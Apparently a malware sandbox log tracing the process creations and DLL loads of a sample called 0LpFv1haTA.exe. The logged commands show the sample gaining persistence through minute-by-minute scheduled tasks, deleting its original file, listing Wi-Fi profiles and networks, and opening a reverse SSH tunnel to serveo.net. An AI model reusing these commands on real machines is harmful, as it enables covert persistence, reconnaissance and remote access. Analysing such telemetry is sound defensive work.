                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
                      Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
                      Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5500 -s 3644
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Users\user\AppData\Roaming\manager.exe "C:\Users\user\AppData\Roaming\manager.exe"
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe "C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe C:\Users\user\AppData\Roaming\XenoManager\manager.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Users\user\AppData\Roaming\manager.exe "C:\Users\user\AppData\Roaming\manager.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe "C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: httpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: httpapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: avicap32.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: msvfw32.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: sspicli.dll
